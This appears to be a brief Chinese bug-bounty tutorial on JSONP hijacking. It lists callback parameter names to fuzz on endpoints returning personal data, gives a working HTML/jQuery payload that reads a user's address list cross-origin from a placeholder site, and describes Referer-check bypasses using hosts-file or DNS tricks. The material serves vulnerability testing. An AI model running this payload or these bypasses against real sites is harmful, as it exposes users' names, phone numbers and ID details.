0x00 介绍
平常挖洞的时候,会遇到大量的json数据的格式,其中包含了用户的敏感信息
当然一般评级是:中低危
0x01 挖掘方式
(1)burp 拦截所有的数据包,在历史流量里直接搜索jsonp、callback等关键字
(2)jsonp fuzz
当遇到json数据返回的时候,且包含敏感信息:如姓名、手机号、身份证、银行卡等等信息时
但原本请求并不是jsonp的请求,因为开发者可能为了方便会预留接口
callback=attack
cb=attack
call=attack
jsonp=attack
jsonpcallback=attack
jsonpcb=attack
json=attack
jsoncallback=attack
jcb=attack
0x02 利用payload
<html><head><title>跨域测试</title><script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.js"></script><script>$(document).ready(function () {$.ajax({url: "https://www.xxxx.com/apic/user/address/list?type=1",type: "GET",dataType: "jsonp", //指定服务器返回的数据类型success: function (data) {var result = JSON.stringify(data); //json对象转成字符串$("#text").val(result);}});});</script></head><body><textarea id="text" style="width: 400px; height: 100px;"></textarea></body></html>
0x03绕过reffer检测
设置reffer为空、或者通过baidu.com.xxx.com 来绕过
(1)修改本地的hosts文件 baidu.com.xxx.com 127.0.0.1
(2)通过修改在线的dns解析 baidu.com.xxx.com 118.118.118.118
